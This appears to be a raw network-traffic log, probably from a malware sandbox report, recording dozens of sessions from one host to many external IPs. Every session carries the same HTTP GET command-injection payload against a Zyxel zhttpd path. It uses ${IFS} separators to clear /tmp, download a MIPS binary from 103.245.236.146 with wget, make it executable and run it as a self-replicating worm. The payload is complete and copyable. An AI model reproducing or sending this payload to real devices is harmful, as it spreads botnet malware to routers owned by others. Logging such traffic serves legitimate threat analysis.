                                                        Jan 28, 2024 10:12:49.333607912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3472192.168.2.145431417.59.181.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333657026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3473192.168.2.1445906183.60.157.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333693027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3474192.168.2.1442852116.87.141.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333728075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3475192.168.2.143461063.174.159.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333781004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3476192.168.2.145502249.226.178.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333795071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3477192.168.2.1436766139.66.131.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333833933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3478192.168.2.144721634.199.166.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333892107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3479192.168.2.1459468164.237.33.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333914995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3480192.168.2.1450342209.154.120.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.333973885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3481192.168.2.1460690191.82.138.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334007978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3482192.168.2.1450590150.238.54.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334028006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3483192.168.2.1437202137.126.197.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334089994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3484192.168.2.1432834199.80.182.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334112883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3485192.168.2.1445594200.124.34.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334162951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3486192.168.2.1454416130.198.35.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334193945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3487192.168.2.1435238200.40.176.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334230900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3488192.168.2.143685461.250.244.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334270954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3489192.168.2.1449376146.229.132.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334310055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3490192.168.2.1438958125.143.163.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334355116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3491192.168.2.145555861.246.180.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334382057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3492192.168.2.145296614.187.220.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334427118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3493192.168.2.14395125.224.144.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334453106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3494192.168.2.1450194142.187.240.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334497929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3495192.168.2.1457798199.93.89.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334534883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3496192.168.2.145248073.255.211.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334563971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3497192.168.2.1437050120.246.162.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334629059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3498192.168.2.144971286.3.67.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334675074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3499192.168.2.143415223.33.87.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334701061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3500192.168.2.1438186174.138.150.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334727049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3501192.168.2.1458122183.102.219.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334778070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3502192.168.2.143732287.246.152.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334831953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3503192.168.2.1441834135.184.56.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334847927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3504192.168.2.144135886.161.160.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334894896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3505192.168.2.1441810124.111.31.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334920883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3506192.168.2.144153445.167.245.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.334964991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3507192.168.2.1435732176.52.2.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335012913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3508192.168.2.145876077.40.68.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335052013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3509192.168.2.144500854.105.111.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335087061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3510192.168.2.1454932138.209.53.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335114956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3511192.168.2.1442154188.192.17.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335128069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3512192.168.2.145405262.196.67.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335164070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3513192.168.2.1441634158.10.136.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335201979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3514192.168.2.1447972134.212.202.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335228920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3515192.168.2.1435828210.248.124.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335253954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3516192.168.2.143647027.84.215.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335306883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3517192.168.2.145868819.176.92.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335336924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3518192.168.2.146080864.61.138.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335367918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3519192.168.2.143754073.47.64.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335436106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3520192.168.2.1447058220.145.54.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335462093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3521192.168.2.1437322142.72.146.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335500956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3522192.168.2.1437774122.35.134.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335530043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3523192.168.2.144923094.122.170.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335553885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3524192.168.2.1447958120.157.143.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335588932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3525192.168.2.144086014.140.199.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335623980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3526192.168.2.1456560223.64.242.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335663080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3527192.168.2.1460554170.237.63.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335715055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3528192.168.2.1440300121.55.183.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335753918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3529192.168.2.144835846.109.48.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335788965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3530192.168.2.1455190162.140.197.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335836887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3531192.168.2.145229676.240.116.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335875034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3532192.168.2.1437132160.18.245.38443
                                                        TimestampBytes transferredDirectionData
